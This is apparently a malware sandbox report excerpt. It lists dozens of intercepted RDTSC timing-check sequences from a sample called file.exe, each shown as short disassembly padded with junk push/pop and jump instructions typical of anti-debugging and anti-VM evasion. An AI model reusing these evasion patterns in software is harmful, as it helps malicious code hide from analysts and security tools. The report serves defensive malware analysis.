    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BC53 second address: 87BC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C229 second address: 87C22D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C5C4 second address: 87C5EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 0000001Eh 0x0000000c mov dword ptr [ebp+122D1D23h], edi 0x00000012 nop 0x00000013 js 00007F713487FC7Ah 0x00000019 push ecx 0x0000001a push eax 0x0000001b pop eax 0x0000001c pop ecx 0x0000001d push eax 0x0000001e pushad 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CA8D second address: 87CA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CA93 second address: 87CADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F713487FC87h 0x0000000e nop 0x0000000f lea eax, dword ptr [ebp+1249B54Bh] 0x00000015 mov dword ptr [ebp+122D2034h], edx 0x0000001b nop 0x0000001c jmp 00007F713487FC87h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push edi 0x00000027 pop edi 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CADF second address: 87CAE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CAE5 second address: 87CAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CAEB second address: 85858F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jp 00007F71347C49D8h 0x0000000f call dword ptr [ebp+122D1E73h] 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F71347C49E0h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85858F second address: 85859E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007F713487FC76h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF239 second address: 8AF26A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a jnl 00007F71347C49DCh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F71347C49E5h 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF26A second address: 8AF27C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F713487FC7Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF27C second address: 8AF285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF285 second address: 8AF290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3CE second address: 8AF3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F71347C49E9h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jnp 00007F71347C49E2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3F6 second address: 8AF3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3FC second address: 8AF406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF6BF second address: 8AF6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF83A second address: 8AF843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF843 second address: 8AF847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B63F6 second address: 8B6400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6400 second address: 8B6406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6406 second address: 8B6428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F71347C49DAh 0x0000000f popad 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007F71347C49D6h 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5029 second address: 8B502F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5335 second address: 8B5339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5E83 second address: 8B5E88 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BBDF4 second address: 8BBE15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BBE15 second address: 8BBE32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F713487FC82h 0x00000008 jng 00007F713487FC76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC0C5 second address: 8BC0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F71347C49E9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC0E4 second address: 8BC0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F713487FC78h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC0F5 second address: 8BC0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F71347C49D6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB7EA second address: 8BB7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB7EE second address: 8BB7F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC4FE second address: 8BC502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC693 second address: 8BC699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC699 second address: 8BC6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC7Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCA81 second address: 8BCAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F71347C49E1h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F71347C49D6h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF70C second address: 8BF725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC85h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF725 second address: 8BF733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F71347C49E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF733 second address: 8BF739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF739 second address: 8BF753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F71347C49E4h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF753 second address: 8BF757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFA3C second address: 8BFA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007F71347C49D6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F71347C49E8h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFA62 second address: 8BFA9A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F713487FC7Eh 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F713487FC84h 0x00000018 jmp 00007F713487FC7Eh 0x0000001d jmp 00007F713487FC7Ah 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFA9A second address: 8BFAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F71347C49D6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1FAF second address: 8C1FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F713487FC85h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1FC9 second address: 8C1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1FD2 second address: 8C1FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F713487FC76h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1FE1 second address: 8C1FF3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F71347C49D6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1FF3 second address: 8C201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F713487FC76h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F713487FC85h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C201C second address: 8C2025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C21BE second address: 8C21C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C21C2 second address: 8C21CC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F71347C49D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C21CC second address: 8C21D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C64CF second address: 8C64E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F71347C49DFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C663F second address: 8C664C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F713487FC7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C68F8 second address: 8C6903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6903 second address: 8C692C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC7Fh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F713487FC80h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C692C second address: 8C6936 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F71347C49D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6BEF second address: 8C6BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D76 second address: 8C6D82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D82 second address: 8C6D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D88 second address: 8C6DF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F71347C49E4h 0x00000012 jmp 00007F71347C49DBh 0x00000017 jmp 00007F71347C49E6h 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007F71347C49E6h 0x00000023 jmp 00007F71347C49E3h 0x00000028 push esi 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E64 second address: 8C9E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E68 second address: 8C9E79 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F71347C49D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E79 second address: 8C9E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F713487FC76h 0x0000000a popad 0x0000000b jp 00007F713487FC78h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop ecx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E93 second address: 8C9E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E9B second address: 8C9EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0AD4 second address: 8D0ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0ADA second address: 8D0ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF22F second address: 8CF259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F71347C49DDh 0x0000000f pop edi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF259 second address: 8CF265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F713487FC76h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF265 second address: 8CF269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF72A second address: 8CF760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC7Eh 0x00000007 jmp 00007F713487FC82h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007F713487FC7Eh 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007F713487FC76h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF760 second address: 8CF766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF766 second address: 8CF76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFB82 second address: 8CFB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFB89 second address: 8CFB8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFB8F second address: 8CFB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D07FC second address: 8D0806 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F713487FC7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6D32 second address: 8D6D38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6FDB second address: 8D6FF0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F713487FC78h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D752B second address: 8D7535 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F71347C49D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D838E second address: 8D8392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D8392 second address: 8D83A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F71347C49D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D83A3 second address: 8D83AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D83AC second address: 8D83B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D83B4 second address: 8D83B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBDB5 second address: 8DBDBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBDBB second address: 8DBDC5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC094 second address: 8DC0B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ebx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC0B2 second address: 8DC0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F713487FC87h 0x00000009 jc 00007F713487FC76h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC0D3 second address: 8DC0D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC236 second address: 8DC23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC23A second address: 8DC24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F71347C49DEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC385 second address: 8DC38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC867 second address: 8DC86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC86C second address: 8DC876 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F713487FC82h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
